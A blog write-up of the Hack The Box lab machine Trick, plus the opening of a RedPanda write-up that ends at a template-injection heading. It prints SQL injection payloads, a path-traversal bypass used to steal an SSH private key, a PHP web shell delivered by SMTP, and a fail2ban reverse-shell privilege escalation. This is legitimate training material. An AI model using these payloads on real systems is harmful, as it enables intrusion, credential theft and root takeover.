Hack The Box Trick Writeup

Hello world and welcome to Haxez. I’m back, attempting to hack my way into the Hack The Box machine called Trick. It’s currently 7:00am on a Tuesday, I have work in a couple of hours but let’s see if we can smash this out before I have to go back to the 9-5. Please note, this isn’t a walkthrough. This is a retired machine write-up that I’m using to skill up.

Trick Enumeration

First, I pinged the box to make sure it was online and then ran a Nmap scan to see what services were listening. As you can see from the output below, SSH, SMTP, DNS and HTTP are open. Some ideas instantly sprang to mind such as enumerating users through SMTP and performing a DNS zone transfer.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sudo nmap -sC -sV -p- -O -A 10.129.245.209 -oA trick
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 07:05 GMT
Stats: 0:02:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 07:09 (0:00:51 remaining)
Nmap scan report for 10.129.245.209
Host is up (0.013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61ff293b36bd9dacfbde1f56884cae2d (RSA)
|   256 9ecdf2406196ea21a6ce2602af759a78 (ECDSA)
|_  256 7293f91158de34ad12b54b4a7364b970 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   12.44 ms 10.10.14.1
2   12.60 ms 10.129.245.209
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.61 seconds

Going in numerical order, I skipped over SSH because unless we brute force it, and have a password or private key, we aren’t getting in. I had a poke at SMTP but there was a weird delay when running commands. I believe I was able to VRFY the root user but I decided I would come back to this later if I needed to.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ nc 10.129.245.209 25
helo
220 debian.localdomain ESMTP Postfix (Debian/GNU)
501 Syntax: HELO hostname
HELO 10.129.245.209
250 debian.localdomain
VRFY root
252 2.0.0 root

That left me with DNS. I used the dig command to query the server for the server’s IP address. The output below shows that the server has a zone file for the domain trick.htb.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ dig @10.129.245.209 -x 10.129.245.209
; <<>> DiG 9.18.11-2~bpo11+1-Debian <<>> @10.129.245.209 -x 10.129.245.209
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48616
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 471a94ac095c0d0aa827a7e8641020d5aa7d0e001cec001a (good)
;; QUESTION SECTION:
;209.245.129.10.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
209.245.129.10.in-addr.arpa. 604800 IN	PTR	trick.htb.

;; AUTHORITY SECTION:
245.129.10.in-addr.arpa. 604800	IN	NS	trick.htb.

;; ADDITIONAL SECTION:
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; Query time: 16 msec
;; SERVER: 10.129.245.209#53(10.129.245.209) (UDP)
;; WHEN: Tue Mar 14 07:23:02 GMT 2023
;; MSG SIZE  rcvd: 165

I added trick.htb to my host file.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sudo echo '10.129.245.209 trick.htb' | sudo tee -a /etc/hosts
10.129.245.209 trick.htb

As DNS TCP was open, I attempted to perform a zone transfer for trick.htb to see what other records there were in its zone file. The results below show the output of the host command. As you can see, there is a subdomain called preprod-payroll.trick.htb.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ host -t axfr trick.htb 10.129.245.209
Trying "trick.htb"
Using domain server:
Name: 10.129.245.209
Address: 10.129.245.209#53
Aliases: 
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47562
;; flags: qr aa; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;trick.htb.			IN	AXFR
;; ANSWER SECTION:
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
Received 192 bytes from 10.129.245.209#53 in 13 ms

I added this to my host file too.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sudo echo '10.129.245.209 preprod-payroll.trick.htb' | sudo tee -a /etc/hosts
10.129.245.209 preprod-payroll.trick.htb

Walking The Websites

I visited the first website (trick.htb) and it didn’t appear that there was much there. It had an under-construction page.

trick.htb

I decided to skip further enumeration of this domain and visited the pre-production payroll website. If it’s pre-production then it’s still in development. If it’s still in development then it could have vulnerabilities. Not that production sites don’t have vulnerabilities but you know what I mean. As this page has a login form, but we don’t yet have credentials, I assume that it is vulnerable to SQL injection.

http://preprod-payroll.trick.htb/

Trick Preproduction Payroll Application SQL Injection

Running an initial SQLMap scan against the application shows that the login parameters are vulnerable to SQL Injection. I followed the official walkthrough for this. It’s extremely cool how we go from finding SQL Injection to being able to read files. We start with a regular SQL injection. You can see from the results below that it found a time-based attack.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick/]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=abc' AND (SELECT 2307 FROM (SELECT(SLEEP(5)))gjOv) AND 'RZSQ'='RZSQ&password=abc
---

Time-based attacks are slow we need to identify if there are any other methods that the server is vulnerable to. To do this we expand the techniques being used. As you can see below, we have now discovered that we have error-based and blind boolean-based SQL Injections.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --level 5 --risk 3 --technique=BEUS --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.12#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=abc' OR NOT 5700=5700-- AlDN&password=abc

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=abc' OR (SELECT 4426 FROM(SELECT COUNT(*),CONCAT(0x71787a6a71,(SELECT (ELT(4426=4426,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VaIS&password=abc

So, in the official write-up, the author then goes on to check the privileges afforded to the SQL server user. As you can see below, the user has FILE privilege which allows them to read files. We can use this to read files that the user has permission to read on the server.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick/]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --privileges
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=abc' AND (SELECT 2307 FROM (SELECT(SLEEP(5)))gjOv) AND 'RZSQ'='RZSQ&password=abc

    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=abc' OR NOT 5700=5700-- AlDN&password=abc

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=abc' OR (SELECT 4426 FROM(SELECT COUNT(*),CONCAT(0x71787a6a71,(SELECT (ELT(4426=4426,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VaIS&password=abc
---
database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE

Using this method, we can retrieve the /etc/passwd file and see what users there are on the system. The more information we have the better.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sqlmap -u http://preprod-payroll.trick.htb/ajax.php?action=login --data="username=abc&password=abc" -p username --batch --file-read=/etc/passwd
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=abc' AND (SELECT 2307 FROM (SELECT(SLEEP(5)))gjOv) AND 'RZSQ'='RZSQ&password=abc

    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=abc' OR NOT 5700=5700-- AlDN&password=abc

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=abc' OR (SELECT 4426 FROM(SELECT COUNT(*),CONCAT(0x71787a6a71,(SELECT (ELT(4426=4426,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VaIS&password=abc
---
files saved to [1]:
[*] /home/haxez/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd 

Let’s check out the passwd file.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ cat /home/haxez/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash

We can also use this method to read the ‘/etc/nginx/sites-enabled/default’ file. Now we can see what other sites are hosted on the server. As you can see, we have found another domain preprod-marketing.trick.htb. By the way, I wouldn’t have thought to check this file, we are on our third domain. I probably would have given up if I couldn’t get in with SQLI.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ cat _etc_nginx_sites-enabled_default
server {
	listen 80 default_server;
	listen [::]:80 default_server;
	server_name trick.htb;
	root /var/www/html;
	index index.html index.htm index.nginx-debian.html;
	server_name _;
	location / {
		try_files $uri $uri/ =404;
	}
	location ~ \.php$ {
		include snippets/fastcgi-php.conf;
		fastcgi_pass unix:/run/php/php7.3-fpm.sock;
	}
}
server {
	listen 80;
	listen [::]:80;
	server_name preprod-marketing.trick.htb;
	root /var/www/market;
	index index.php;
	location / {
		try_files $uri $uri/ =404;
	}
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
        }
}
server {
        listen 80;
        listen [::]:80;
        server_name preprod-payroll.trick.htb;
        root /var/www/payroll;
        index index.php;
        location / {
                try_files $uri $uri/ =404;
        }
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}

Trick Preprod-Marketing Server Side Includes

Let’s echo that new subdomain/virtual host to our hosts’ file.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ echo '10.129.245.209 preprod-marketing.trick.htb' | sudo tee -a /etc/hosts
10.129.245.209 preprod-marketing.trick.htb

So, we can now visit this site and see what’s occurring. The image below shows the site and something interesting about the way it is retrieving the about page. As you can see below, rather than having a path to the file like “example.com/about.html” it is using a PHP parameter to retrieve the page. This is suspicious and it is likely performing a server-side include. Hopefully, we can exploit this to perform local file inclusion.

http://preprod-marketing.trick.htb/index.php?page=about.html

First, I attempted to grab the ‘/etc/passwd’ file using the standard ‘/../../../etc/passwd’. However, this didn’t work so I assumed that there was some type of filtering taking place. Next, I doubled down on this attack and doubled up our characters we are able to perform local file inclusion to get the /etc/passwd file. This is great but it doesn’t really get us anything. We can’t upload a shell to the server.

http://preprod-marketing.trick.htb/index.php?page=//....//....//....//....//....//....//....//....//etc/passwd
Loca File Inclusion

SMTP Magic Trick

Do you want to see a magic trick? remember that SMTP port earlier? well, we can use it to write a shell that we can then call with the local file inclusion. Yeah, I was amazed by this. So we need to nc back to the SMTP port and craft an email.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ nc trick.htb 25
helo
220 debian.localdomain ESMTP Postfix (Debian/GNU)
mail from: haxez
250 2.1.0 Ok
rcpt to: michael
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 4935F4099C

Next, we create our listener so that when our reverse shell comes back from our PHP Web Shell, it has a friend to talk to.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sudo nc -lvnp 1337
listening on [any] 1337 ...

And finally, we run the command that tricks the system into connecting back to us. Then we should be able to use the PHP Web Shell to get a reverse shell. But, the instructions in the official walkthrough don’t work. This is a pretty common and unfortunate occurrence, unfortunately. You would expect the official walkthrough to be correct, wouldn’t you?

No shell, fail

Moving On

It’s a shame that this didn’t work, I have read another article where the hacker used the same technique and it worked but I can’t replicate it. So instead of banging my frustrated face up against a brick wall, I’m going to take the easy path. I will come back to this one later. We have local file inclusion and we know there is a user called Michael. Surely the webserver doesn’t have permission to access Michale’s private key.

http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//home/michael/.ssh/id_rsa
Private key

And now we have SSH access.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Trick]
└──╼ [★]$ cd ~/
┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[~]
└──╼ [★]$ sudo vim ssh.key
┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[~]
└──╼ [★]$ sudo chmod 600 ssh.key
┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[~]
└──╼ [★]$ sudo ssh -i ssh.key [email protected]
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
[email protected]:~$ 

Trick Privilege Escalation

Ok, we now have access to the Michael user. We can run sudo -l and see what we can run. As you can see below, we can restart the fail2ban service as root without a password.

[email protected]:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

Ok, let’s take a look at the permissions within the fail2ban directory.

[email protected]:/etc/fail2ban$ ls -laSH
total 76
-rw-r--r--   1 root root     22908 Mar 14 10:18 jail.conf
drwxr-xr-x 126 root root     12288 Mar 14 09:53 ..
drwxr-xr-x   6 root root      4096 Mar 14 10:18 .
drwxrwx---   2 root security  4096 Mar 14 10:18 action.d
drwxr-xr-x   2 root root      4096 Mar 14 10:18 fail2ban.d
drwxr-xr-x   3 root root      4096 Mar 14 10:18 filter.d
drwxr-xr-x   2 root root      4096 Mar 14 10:18 jail.d
-rw-r--r--   1 root root      2827 Mar 14 10:18 paths-common.conf
-rw-r--r--   1 root root      2334 Mar 14 10:18 fail2ban.conf
-rw-r--r--   1 root root       738 Mar 14 10:18 paths-opensuse.conf
-rw-r--r--   1 root root       645 Mar 14 10:18 paths-arch.conf
-rw-r--r--   1 root root       573 Mar 14 10:18 paths-debian.conf

The ‘action.d’ directory stands out as its group owner is security. Let’s check our group and see if we are in that group.

[email protected]:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

Cool, what now? Apparently the iptables-multiport.conf has a command in it that gets run when a user gets banned. If we can modify this value then we can run our own command by triggering a ban. I presume that is what we’re meant to do. However, we can’t edit this file but we can move it.

[email protected]:/etc/fail2ban/action.d$ mv iptables-multiport.conf .old
[email protected]:/etc/fail2ban/action.d$ cp .old iptables-multiport.conf
[email protected]:/etc/fail2ban/action.d$ ls -l iptables-multiport.conf
-rw-r--r-- 1 michael michael 1420 Mar 14 10:26 iptables-multiport.conf

This is wild, we now own the file but when we restart fail2ban, any commands in this file will still be executed as root right? I think. This is confusing.

Fail2ban to shell

Now we modify the ‘iptables-multiport.conf’ file and change ‘actionban’ value to /tmp/shell.sh. Then we create ‘shell.sh’ in /tmp which has a reverse shell back to our host.

[email protected]:/etc/fail2ban/action.d$ cd /tmp
[email protected]:/tmp$ vim shell.sh
[email protected]:/tmp$ chmod +x shell.sh 
[email protected]:/tmp$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.

We have now changed the behaviour of what happens when fail2ban tries to ban someone. Instead of banning them, it will launch our reverse shell. We can trigger this by brute-forcing SSH.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[~]
└──╼ [★]$ crackmapexec ssh 10.129.245.222 -u haxez -p rockyou.txt
SSH         10.129.245.222  22     10.129.245.222   [*] SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:123456 Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:12345 Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:123456789 Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:password Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:iloveyou Authentication failed.
SSH         10.129.245.222  22     10.129.245.222   [-] haxez:princess Authentication failed.

After a while, we get a shell back which we can use to capture the root flag.

┌─[eu-dedivip-1]─[10.10.14.126]─[[email protected]]─[/Trick]
└──╼ [★]$ sudo nc -lvnp 1337
[sudo] password for haxez: 
listening on [any] 1337 ...
connect to [10.10.14.126] from (UNKNOWN) [10.129.245.222] 53330
bash: cannot set terminal process group (1799): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# cat /root/root.txt

cat /root/root.txt
f8f▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓694

Trick Review

I will keep this short as I have work today. it’s 9:50 so it didn’t take me long to complete but I wouldn’t have had a clue without the official walkthrough. This is yet another easy box which isn’t easy. Perhaps when I complete them all I will actually have a methodology to solve these crazy boxes. Anyway, it was fun I guess, I enjoyed the DNS enumeration and would have loved for the SMTP trick to work. Anyway, I’m done. Time to look for a new career because I clearly suck at hacking.

Hack The Box RedPanda Writeup

Hello world and welcome to Haxez, today I will be taking on the “easy” Hack The Box Machine RedPanda. I put “easy” in quotes because attempting to beat this box was harder than a typical easy box. However, the last two I have completed have both been more difficult than I have come to expect. This box requires some web enumeration and knowledge of SSTI or Service Side Template Injection. Then it gets crazy and I will do my best to explain it when we get there. Please be advised that I couldn’t solve this without the official walkthrough and IppSec’s video. As such, the techniques you see will not be unique.

RedPanda Enumeration

First things first, let’s find out what we’re dealing with. I ran Nmap against the box targeting all ports, requesting service versions and I put the ‘-A’ flag on there to show this RedPanda that I wasn’t messing around. After a while, the scan came back and ports 22 for ssh and 8080 for HTTP were open. I’ve snipped a bunch of the output off as it wasn’t of much value.

┌─[[email protected]]─[~]
└──╼ $sudo nmap -sC -sV -O -A 10.129.247.33
[sudo] password for joe: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 10:44 GMT
Nmap scan report for 10.129.247.33
Host is up (0.034s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
8080/tcp open  http-proxy
|_http-title: Red Panda Search | Made with Spring Boot
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings: 
|_    Request</h1></body></html>
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   30.70 ms 10.10.14.1
2   62.13 ms 10.129.247.33
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.62 seconds

Panda Power

As HTTP was the only thing for us to investigate, I opened Firefox and started poking around. Sites like this remind me of the old internet. When everyone had a website just for fun and not just for commerce. This website is for photos of Red Pandas… that’s it. How cool is that, bring the old internet back. Anyway, looking around the site there didn’t appear to be much functionality.

RedPanda Website

However, there was a search functionality that I used to gather more information about the technologies in use. As you can see below, I captured the request in Burp and changed the HTTP request method from POST to GET. Consequently, this produced an error message which revealed the type of application in use. The error message reports “Whitelabel Error Page” which when googled reveals that it’s a Spring Boot error.

RedPanda Error Message

Fuzzy Panda

I used ffuf to fuzz the application to find special characters that caused the application to error. Identically to IppSec, I used the ‘SecLists/master/Fuzzing/special-chars.txt’ wordlist. As shown below, there were a number of characters that resulted in the application producing a 500 error. I’m not great at testing applications but I tend to check the response length, response time and HTTP response code for indications of a vulnerability. In order to do this, I save the request from burp and changed the value of the name parameter to FUZZ. This way ffuf can identify what needs to be fuzzed.

Search Request
┌─[[email protected]]─[~/RedPanda]
└──╼ $ffuf -request search.request -request-proto http -w special-chars.txt 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
       v1.4.1-dev
______________________________________________
 :: Method           : POST
 :: URL              : http://10.129.247.33:8080/search
 :: Wordlist         : FUZZ: special-chars.txt
 :: Header           : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 :: Header           : Referer: http://10.129.247.33:8080/
 :: Header           : Accept-Encoding: gzip, deflate
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Header           : Host: 10.129.247.33:8080
 :: Header           : Cache-Control: max-age=0
 :: Header           : Upgrade-Insecure-Requests: 1
 :: Header           : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
 :: Header           : Origin: http://10.129.247.33:8080
 :: Header           : Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
 :: Header           : Connection: close
 :: Data             : name=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
| [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 121ms]
# [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 480ms]
; [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 499ms]
? [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 531ms]
~ [Status: 200, Size: 755, Words: 159, Lines: 29, Duration: 551ms]
. [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 552ms]
/ [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 514ms]
_ [Status: 200, Size: 755, Words: 159, Lines: 29, Duration: 580ms]
- [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 580ms]
< [Status: 200, Size: 727, Words: 156, Lines: 29, Duration: 611ms]
( [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 598ms]
& [Status: 200, Size: 1039, Words: 205, Lines: 34, Duration: 615ms]
$ [Status: 200, Size: 755, Words: 159, Lines: 29, Duration: 695ms]
> [Status: 200, Size: 727, Words: 156, Lines: 29, Duration: 698ms]
, [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 701ms]
^ [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 675ms]
: [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 705ms]
[ [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 712ms]
* [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 670ms]
' [Status: 200, Size: 728, Words: 156, Lines: 29, Duration: 713ms]
! [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 712ms]
= [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 688ms]
] [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 718ms]
" [Status: 200, Size: 729, Words: 156, Lines: 29, Duration: 719ms]
@ [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 721ms]
) [Status: 500, Size: 298, Words: 32, Lines: 1, Duration: 729ms]
` [Status: 200, Size: 724, Words: 156, Lines: 29, Duration: 733ms]
\ [Status: 500, Size: 298, Words: 32, Lines: 1, Duration: 735ms]
+ [Status: 500, Size: 298, Words: 32, Lines: 1, Duration: 759ms]
{ [Status: 500, Size: 298, Words: 32, Lines: 1, Duration: 759ms]
} [Status: 500, Size: 298, Words: 32, Lines: 1, Duration: 759ms]
Progress: [32/32]: Job [1/1]: 0 req/sec: Duration: [0:00:00]: Errors: 0

Server Side Template Injection

